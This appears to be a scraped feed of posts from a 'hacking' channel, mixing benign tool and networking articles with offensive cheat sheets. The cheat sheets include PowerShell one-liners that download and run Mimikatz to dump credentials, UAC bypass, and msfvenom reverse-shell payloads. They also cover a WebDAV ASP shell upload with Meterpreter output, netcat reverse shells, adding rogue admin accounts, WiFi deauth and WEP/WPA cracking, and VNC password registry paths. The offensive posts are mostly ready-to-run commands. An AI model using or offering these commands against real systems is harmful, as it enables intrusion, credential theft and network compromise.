▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑JOMLA WEB-HACKING :

OWASP Joomla! Vulnerability Scanner (JoomScan) is an open source project, developed with the aim of automating the task of vulnerability detection and reliability assurance in Joomla CMS deployments. Implemented in Perl, this tool enables seamless and effortless scanning of Joomla installations, while leaving a minimal footprint with its lightweight and modular architecture. It not only detects known offensive vulnerabilities, but also is able to detect many misconfigurations and admin-level shortcomings that can be exploited by adversaries to compromise the system. Furthermore, OWASP JoomScan provides a user-friendly interface and compiles the final reports in both text and HTML formats for ease of use and minimization of reporting overheads.
OWASP JoomScan is included in Kali Linux distributions.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/rezasp/joomscan.git

2️⃣cd joomscan

3️⃣perl joomscan.pl

4️⃣ For Docker installation and usage

# Build the docker image
docker build -t rezasp/joomscan .

# Run a new docker container with reports directory mounted at the host
docker run -it -v /path/to/reports:/home/joomscan/reports --name joomscan_cli rezasp/joomscan

5️⃣ For accessing the docker container you can run the following command
docker run -it -v /path/to/reports:/home/joomscan/reports --name joomscan_cli --entrypoint /bin/bash rezasp/joomscan

6️⃣Do default checks...
perl joomscan.pl --url www.example.com
or
perl joomscan.pl -u www.example.com

7️⃣Enumerate installed components...
perl joomscan.pl --url www.example.com --enumerate-components
or
perl joomscan.pl -u www.example.com --ec


Set cookie
perl joomscan.pl --url www.example.com --cookie "test=demo;"


Set user-agent
perl joomscan.pl --url www.example.com --user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
or

🦑FEATURES :

Automated ...
*Version enumerator
*Vulnerability enumerator (based on version)
*Components enumerator (1209 most popular by default)
*Components vulnerability enumerator (based on version)(+1030 exploit)
*Firewall detector
*Reporting to Text & HTML output
*Finding common log files
*Finding common backup files


enjoy❤️👍🏻
✅Topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST HACKING PROGRAMMING LANGUAGES:
#ForBeginers

1. Python

Python is one of the more commonly used programming languages ​​for developers. Many large enterprises choose Python for product development, such as: NASA, Google, Instagram, Spotify, Uber, Netflix, etc., and it is very wonderful that both beginners and professionals like Python, so it can be seen Popularity. If you are a technical professional in the big data profession, then Python is arguably the most suitable.

2. R

R is a language that can be easily connected to a database management system (DBMS), but in fact it does not provide any spreadsheet data view. However, the larger feature of R language is that it provides a variety of graphical functions for data representation, such as bar charts, pie charts, time series, point charts, 3D surfaces, image charts, maps, scatter charts, and so on. The R language can help users easily customize graphics and develop novel graphics with characteristics.

3. Java

After Java appeared, it was widely known for its versatility in data science and technology. Moreover, the open source framework Hadoop HDFS for processing and storing big data applications has been written entirely in Java. Java is also widely used to build various ETL applications, such as Apache, Apache Kafka, and Apache Camel. These applications are used to run data extraction, data conversion, and loading in a big data environment.

4. Scala

Scala is an open source high-level programming language, currently mainly used in the financial industry. A relatively large feature of Scala is its importance in ensuring the availability of big data. In short, Apache Spark is a cluster computing framework for big data applications. Big data practitioners generally need to have extensive knowledge and operational experience related to Scala.

5. Kotlin

Kotlin is a very good Android application development language that can run on the JVM. To some extent, it overcomes some of the shortcomings of Java and provides many modern functions. The main feature of Kotlin is its language design, which provides excellent pointers, security, type inference and other functions. The huge ecosystem of existing Java libraries is available for Kotlin, because Kotlin also runs in the JVM.

6. Go

The Go programming language has great concurrency support. Go uses "Goroutine" (lightweight green thread) and "Channel" for messaging. It does not provide "shared memory" concurrency through threads and locks, because in this case, programming will be more difficult. But it provides CSP-based messaging concurrency.

Go's favorite feature is simplicity. Novice developers can use it to write efficient code in just a few days, which is actually very similar to Python. Moreover, some large-scale cloud-native projects are also written in Go.

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Warning : all windows 10 users Special 2019 version and lower;
should update their Systems —
Xp3 the old system sometimes more secure than Win 10 2019😂

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Where Windows Store VNC Passwords ?
#fastTips

VNC passwords in Windows are stored in the registry in the following branches (the list may be incomplete):

\ HKEY_LOCAL_MACHINE \ SOFTWARE \ TigerVNC \ WinVNC4
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ TightVNC \ Server
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ ORL \ WinVNC3 \ Default
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ RealVNC \ WinVNC4 \
\ HKEY_CURRENT_USER \ Software \ TightVNC
\ HKEY_CURRENT_USER \ Software \ TurboVNC
\ HKEY_CURRENT_USER \ Software \ ORL \ WinVNC3 \ Password
\ HKEY_USERS \ .DEFAULT \ Software \ ORL \ WinVNC3 \ Password


> The password is stored in binary form, its length is 8 bytes.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Featuresd for detect a Tcp connections :

> NS - bit 103. ECN-nonce - concealment protection

> CWR (Congestion Window Reduced) - bit 104. Field “Congestion Window Reduced” - the flag is set by the sender to indicate that a packet has been received with the ECE flag set

> ECE - bit 105. ECE (ECN-Echo) - Field “ECN Echo” - indicates that this node is capable of ECN (explicit notification of congestion) and to indicate to the sender about network congestion (RFC 3168)

> URG - bit 106. The "Importance Index" field is enabled. If set to 0, Urgent Pointer is not used; if set to 1, then Urgent Pointer is used.

>ACK is bit 107. This bit is set for a packet to indicate that this is a response to another packet we received that contains data. A confirmation package is always sent to indicate that we actually received the package and that it does not contain errors. If this bit is set, the original data sender will check the confirmation number to see which packet is actually acknowledged, and then unload it from the buffers.

> PSH - bit 108. The PUSH flag is used to instruct the TCP protocol on any intermediate hosts to send data to the actual user, including the TCP implementation on the receiving host.
>
This will push through all the data, no matter where and how much from the TCP window has already been transmitted.



> RST - bit 109. The RESET flag is set to tell the other end to disconnect the TCP connection. This is done in several different scenarios, the main reasons for which is that the connection was disconnected for some reason, if the connection does not exist or if the packet is somehow wrong.


>SYN - bit 110. SYN (or sequence number synchronization) is used during the initial connection establishment. It is installed in two connection instances: the initial packet that opens the connection, and the response SYN / ACK packet. It should never be used outside of these cases.

> FIN is bit 111. The FIN bit indicates that the host that sent the FIN bit no longer has data to send. When the other end sees the FIN bit, it will reply FIN / ACK. Once this is done, the host that originally sent the FIN bit will no longer be able to send any data. However, the other end may continue to send data until it completes, and then sends the FIN packet back and waits for the final FIN / ACK, after which the connection is sent to the CLOSED state.

written by under code
powered by wiki
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑analyze and reverse engineer Android applications.

F E A T U R E S :


> Displays all extracted files for easy reference
> Automatically decompile APK files to Java and Smali format
>Analyze AndroidManifest.xml for common vulnerabilities and behavior
>Static source code analysis for common vulnerabilities and behavior
Device info
Intents
Command execution
SQLite references
Logging references
Content providers
Broadcast recievers
Service references
File references
Crypto references
Hardcoded secrets
URL's
Network connections
SSL references
WebView references
-TERMUX / lINUX

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/1N3/ReverseAPK.git

2️⃣cd ReverseAPK

3️⃣./install

4️⃣to use

> reverse-apk <apk_name>

That's all !
ENJOY❤️👍🏻
✅topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

2020 interesting cve Wordpress Plugin Powie's WHOIS Domain Check 0.9.31 - Persistent Cross-Site Scripting

-Leaked then uploaded to cve site

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Changes of Linux network data forwarding plane-from kernel protocol stack to DPDK/XDP


> To the effect that, with the evolution of IO devices, their access / transmission rate has exceeded the CPU-to-memory storage / transmission rate, could no longer slow peripherals , so, the management of these devices and fast In order to adapt to changes in operation, in this sense, the almost unchanging Linux kernel does hinder performance optimization in many ways.

> This may be the essential reason why people are now turning to DPDK/netmap or XDP. how to say?

In the impression of people, a standard computer contains three major pieces:

1) CPU, the central processing unit.

2) The memory is suspended on a chip similar to the North Bridge.
Peripherals, slow IO devices, are suspended on a chip similar to the South Bridge.

3) This is what we learned in the course "The Principle of Computer Composition". In fact, this is the reality of the computer, so the child, according to von Neumann computer abstract point of view, does not contain computer peripherals, it is only the CPU and memory, emphasizing storage and execution, is stored execution of a computer.

🦑With the actual computer composition, the next step is to design an operating system to manage these things. In fact, almost any operating system can be divided into different modules according to this pile of things:

1) Process management, managing CPU time-sharing and scheduling.

2) Memory management, manage memory allocation.

3) File system to manage file organization.

4) Network protocol stack to manage network IO.

5) Disk drive,...
…

🦑In fact, from the beginning, called on the name of the object in addition to the CPU, memory, peripherals (disk is a sense), and connect it to the relatively slow bridge chip, is the assumption behind relative to the CPU and memory, these The IO device is slow.

> Therefore, in order to manage these slow devices, the operating system has to design a complicated mechanism for rate adaptation, data caching, etc., whether it is Unix/Linux or Windows, are designed under this assumption.

However, things are quietly changing, and peripherals are gradually becoming faster and more intelligent. They are almost the same as CPUs. More and more peripherals have built-in memory chips, just like another group of CPU/memory hanging on the same block On the motherboard...

🦑At this time, the operating system should be more suitable as a coordinator, and no longer suitable for continuing to be a manager, but the complex management mechanisms of the old era still exist. Take the network protocol stack as an example:

1) The synchronization overhead of various linked lists in a multi-CPU environment.

2) The non-sleepable soft interrupt path is too long.

3) The allocation and release of sk_buff.

4) Memory copy overhead.

5) Cache miss caused by context switching.
…

6) Clearly, these mechanisms slow age 10Mbps / 100Mbps network card is no problem, at that time the application most of the time waiting for the card to send data. Now in the era of 1000Mbps/10Gbps/40Gbps network cards, the reverse is true. The data is quickly received, but it is all blocked in the core.

🦑Therefore, various optimization measures should come with the demand:

1) Network card RSS, multiple queues.

2) Interrupt threading.

3) Split lock granularity.

4) Busypoll.

Share us❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Support & Share :

T.me/UndercodeTesting

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"

# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"

# PowerUp: Privilege escalation checks
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks”

# Invoke-Inveigh and log output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y"

# Invoke-Kerberoast and provide Hashcat compatible hashes
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"

# Invoke-ShareFinder and print output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

# Import PowerView Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

# Invoke-Bloodhound
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

# Find GPP Passwords in SYSVOL
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)

# Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe

# Insert reg key to enable Wdigest on newer versions of Windows
reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1


ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑PORT FORWARDING "port to port":
-Your own :

----MSF----
Most platforms

Forward:
Get meterpreter session on one of the dual homed machines
portfwd add -l 4445 -p 4443 -r 10.1.1.1
Use -R to make it reverse


----SSH----
For Linux

~C "if you already have an SSH session"

-R 8081:172.24.0.2:80 (on my Kali machine listen on 8081, get it from 172.24.0.2:80)
<KALI 10.1.1.1>:8081<------------<REMOTE 172.24.0.2>:80
Now you can access 172.24.0.2:80, which you didn't have direct access to


-L 8083:127.0.0.1:8084 (on your machine listen on 8083, send it to my Kali machine on 8084)
<KALI 127.0.0.1>:8084<------------<REMOTE 10.1.1.230>:8083<------------<REMOTE X.X.X.X>:XXXX
run nc on port 8084, and if 10.1.1.230:8083 receives a reverse shell, you will get it


For reverse shell:
msfvenom -p linux/x86/shellreversetcp LHOST=10.1.1.230 LPORT=8083 -f exe -o shell
Run it on 2nd remote target to get a shell on Kali


Or if you didn't have an SSH session, then SSH to your Kali from target machine:
On Kali: service ssh start "add a user, give it /bin/false in /etc/passwd"
ssh - -R 12345:192.168.122.228:5986 test@10.1.1.1


---PLINK----
Just like SSH, on Windows
service ssh start , and transfer /usr/share/windows-binaries/plink.exe to the target machine
On Target: plink.exe 10.1.1.1 -P 22 -C -N -L 0.0.0.0:4445:10.1.1.1:4443 -l KALIUSER -pw PASS

---SOCAT----
For linux

Forward your 8083 to 62.41.90.2:443
./socat TCP4-LISTEN:8083,fork TCP4:62.41.90.2:443


---CHISEL----
Most platforms
Remote static tunnels "port to port":

On Kali "reverse proxy listener":
./chisel server -p 8000 -reverse

General command:
./chisel client <YOUR IP>:<YOUR CHISEL SERVER PORT> L/R:YOUR LOCAL IP:<TUNNEL LISTENING PORT>:<TUNNEL TARGET>:<TUNNEL PORT>


Remote tunnels "access IP:PORT you couldn't access before":
On Target:
./chisel client 10.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80


Local tunnels "listen on the target for something, and send it to us":
On Target:
./chisel client 10.1.1.1:8000 9001:127.0.0.1:8003
----------------------------------------------------------------------------------------

DYNAMIC "port to any":
setup proxychains with socks5 on 127.0.0.1:1080
Or set up socks5 proxy on firefox
For nmap use -Pn -sT or use tcp scanner in msf

----MSF----
Most platforms

Get meterpreter session on one of the dual homed machines
Auto route to 10.1.1.0 (multi/manage/autoroute)
Start socks proxy (auxiliary/server/socks4a)

(portscan once created route)
use auxilliary/scanner/portscan/tcp
set RHOSTS IP (pivoting onto thats not part of arpscan you ran)
(if a machine has port 80 and webports, to check it through out machine we have to create a portworward)
portfwd add -l 8001 -p 80 -r IP
(then go to 127.0.0.1:8001)

----SSH----
For Linux
-D1080

---PLINK---
Just like SSH, on Windows
On Target: plink.exe 10.1.1.1 -P 22 -C -N -D 1080 -l KALIUSER -pw PASS

---CHISEL----
Most platforms

On Kali:
./chisel server -p 8000 -reverse

On Target:
./chisel client 10.1.1.1:8000 R:8001:127.0.0.1:1080
./chisel server -p 8001 --socks5

On Kali:
./chisel client 127.0.0.1:8001 socks


ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WPA2 PSK attack with aircrack-ng suite.
#TipsForBeginers

ifconfig wlan1 # check wireless IFace
sudo airmon-ng check kill # kill issue causing processes
sudo airmon-ng start wlan1 # start monitor mode
sudo airodump-ng wlan1mon # start capturing
sudo airodump-ng --bssid 64:66:B3:6E:B0:8A -c 11 wlan1mon -w output
sudo aireplay-ng --deauth 5 -a 64:66:B3:6E:B0:8A wlan1mon # deauthenticate the client
sudo aircrack-ng output-01.cap dict # crack the passphrase


WPA PSK attack with aircrack-ng suite.
--------------------------------------

Place your wireless card into Monitor Mode
airmon-ng start wlan0

Detect all available wireless AP’s and clients
airodump-ng mon0

Setting adapter channel
iwconfig mon0 channel <channelnumber>

Capturing the four-way handshake
airodump-ng --channel <channelnumber> --bssid <bssid> --write capture mon0

You can capture the handshake passively (it takes time) or de-authenticate a client.

De-authentication attack
aireplay-ng --deauth 3 -a <BSSID> -c <clientmac> mon0

Deauth every client - aireplay-ng -0 5 -a <bssid> mon0

Dictionary Attack
aircrack-ng -w passwords.lst capture-01.cap

Brute force Attack
crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap


WEP attack with aircrack-ng suite.
----------------------------------

Place your wireless card into Monitor Mode
airmon-ng start wlan0

Detect all available wireless AP’s and clients
airodump-ng mon0

Setting adapter channel
iwconfig mon0 channel <channelnumber>

airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

aircrack-ng -b (bssid) (file name-01.cap)


Rogue Access Point Testing
--------------------------

# ifconfig wlan0 down
# iw reg set BO
# iwconfig wlan0 txpower 0
# ifconfig wlan0 up
# airmon-ng start wlan0
# airodump-ng --write capture mon0

root@backbox:/home/backbox# ifconfig wlan1 down
root@backbox:/home/backbox# iw reg set BO
root@backbox:/home/backbox# ifconfig wlan1 up
root@backbox:/home/backbox# iwconfig wlan1 channel 13
root@backbox:/home/backbox# iwconfig wlan1 txpower 30
root@backbox:/home/backbox# iwconfig wlan1 rate 11M auto


Reaver
------

airmon-ng start wlan0
airodump-ng wlan0
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1


Pixie WPS
---------

airmon-ng check
airmon-ng start wlan0
airodump-ng wlan0mon --wps
reaver -i wlan0mon -c 11 -b 00:00:00:00:00:00 -K 1


Wireless Notes
--------------

Wired Equivalent Privacy (WEP)
RC4 stream cipher w/ CRC32 for integrity check
- Attack:
By sniffing an ARP packet, then replaying it to get many encrypted replies with different IVs.
- Remediation:
Use WPA2

Wifi Protected Access (WPA)
Temporal Key Integrity Protocol (TKIP) Message Integrity Check
- Attack:
Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station.
- Remediation:
Use long-keys

Wifi Protected Access 2 (WPA2)
Advanced Encryption Standard (AES)
- Attack:
Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station.
- Remediation:
WPA-Enterprise


ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WIRELESS ANTENNA ALL YOU NEED IS HIT UP THOSE COMMANDS ON YOUR TEMINAL :)
- #Wifihacking


Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
Increase Wi-Fi TX Power
root@uceka:~# iw reg set B0
root@uceka:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto>
#txpower is 30 (generally)
#txpower is depends your country, please googling
root@uceka:~# iwconfig
Change WiFi Channel
root@uceka:~# iwconfig wlan0 channel <SetChannel(1-14)>


WEP CRACKING


Method 1 : Fake Authentication Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
root@uceka:~# aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

Method 2 : ARP Replay Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -3 –x 1000 –n 1000 –b <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

Method 3 : Chop Chop Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 –e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aireplay-ng -4 –b <BSSID> -h <OurMac> wlan0mon
#Press ‘y’ ;
root@uceka:~# packetforge-ng -0 –a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
root@uceka:~# aireplay-ng -2 –r <FileName2> wlan0mon
root@uceka:~# aircrack-ng <PCAP_of_FileName>

Method 4 : Fragmentation Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 –e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aireplay-ng -5 –b<BSSID> -h < OurMac > wlan0mon
#Press ‘y’ ;
root@uceka:~# packetforge-ng -0 –a <BSSID> -h < OurMac > -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
root@uceka:~# aireplay-ng -2 –r <FileName2> wlan0mon
root@uceka:~# aircrack-ng <PCAP_of_FileName>

Method 5 : SKA (Shared Key Authentication) Type Cracking
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@uceka:~# aireplay-ng -0 10 –a <BSSID> -c <VictimMac> wlan0mon
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# macchanger –-mac <VictimMac> wlan0mon
root@uceka:~# ifconfig wlan0mon up
root@uceka:~# aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon
root@uceka:~# aireplay-ng –-deauth 1 –a <BSSID> -h <FakedMac> wlan0mon
root@uceka:~# aircrack-ng <PCAP_of_FileName>

ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

reverse engineering tutorial

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SOME Windows TRICKS :

Windows Privilege Escalation resource
http://www.fuzzysecurity.com/tutorials/16.html


Try the getsystem command using meterpreter - rarely works but is worth a try.
meterpreter > getsystem


Metasploit Meterpreter Privilege Escalation Guide
https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/


Windows Server 2003 and IIS 6.0 WEBDAV Exploiting
http://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html

msfvenom -p windows/meterpreter/reversetcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txt

cadavar http://$ip
dav:/> put aspshell.txt
Uploading aspshell.txt to `/aspshell.txt':
Progress: [=============================>] 100.0% of 38468 bytes succeeded.
dav:/> copy aspshell.txt aspshell3.asp;.txt
Copying `/aspshell3.txt' to `/aspshell3.asp%3b.txt': succeeded.
dav:/> exit

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reversetcp
msf exploit(handler) > set LHOST 1.2.3.4
msf exploit(handler) > set LPORT 80
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j

curl http://$ip/aspshell3.asp;.txt

* Started reverse TCP handler on 1.2.3.4:443
* Starting the payload handler...
* Sending stage (957487 bytes) to 1.2.3.5
* Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700


Windows privledge escalation exploits are often written in Python. So, it is necessary to compile the using pyinstaller.py into an executable and upload them to the remote server.

pip install pyinstaller
wget -O exploit.py http://www.exploit-db.com/download/31853
python pyinstaller.py --onefile exploit.py


Windows Server 2003 and IIS 6.0 privledge escalation using impersonation:
https://www.exploit-db.com/exploits/6705/
https://github.com/Re4son/Churrasco
c:\Inetpub>churrasco
churrasco
/churrasco/-->Usage: Churrasco.exe -d "command to run"

c:\Inetpub>churrasco -d "net user /add <username> <password>"
c:\Inetpub>churrasco -d "net localgroup administrators <username> /add"
c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users" <username> /ADD"


Windows MS11-080 - http://www.exploit-db.com/exploits/18176/
python pyinstaller.py --onefile ms11-080.py
mx11-080.exe -O XP


Powershell Exploits - You may find that some Windows privledge escalation exploits are written in Powershell. You may not have an interactive shell that allows you to enter the powershell prompt. Once the powershell script is uploaded to the server, here is a quick one liner to run a powershell command from a basic (cmd.exe) shell:

MS16-032 https://www.exploit-db.com/exploits/39719/
powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"


Powershell Priv Escalation Tools
https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc


Windows Run As - Switching users in linux is trival with the SU command. However, an equivalent command does not exist in Windows. Here are 3 ways to run a command as a different user in Windows.


Sysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have thier username and password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Psexec (on a 64 bit system).

C:\>psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com


Runas.exe is a handy windows tool that allows you to run a program as another user so long as you know thier password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Runas.exe:

C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
Enter the password for Test:
Attempting to start nc.exe as user "COMPUTERNAME\Test" ...

ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Top Windows 10 Public Cve & Bugs :


CVE-2015-1769 MS15-085 - Vulnerability in Mount Manager - Could Allow Elevation of Privilege

CVE-2015-2426 ms15_078_atmfd_bof MS15-078 - exploits a pool based buffer overflow in the atmfd.dll driver

CVE-2015-2479 MS15-092 - Vulnerabilities in .NET Framework - Allows Elevation of Privilege

CVE-2015-2513 MS15-098 - Vulnerabilities in Windows Journal - Could Allow Remote Code Execution

CVE-2015-2423 MS15-088 - Unsafe Command Line Parameter
Passing - Could Allow Information Disclosure

CVE-2015-2431 MS15-080 - Vulnerabilities in Microsoft Graphics Component - Could Allow Remote Code Execution

CVE-2015-2441 MS15-091 - Vulnerabilities exist when Microsoft Edge improperly accesses objects in memory - allows remote code execution

CVE-2015-0057 exploits GUI component of Windows namely the scrollbar element - allows complete control of a Windows machine



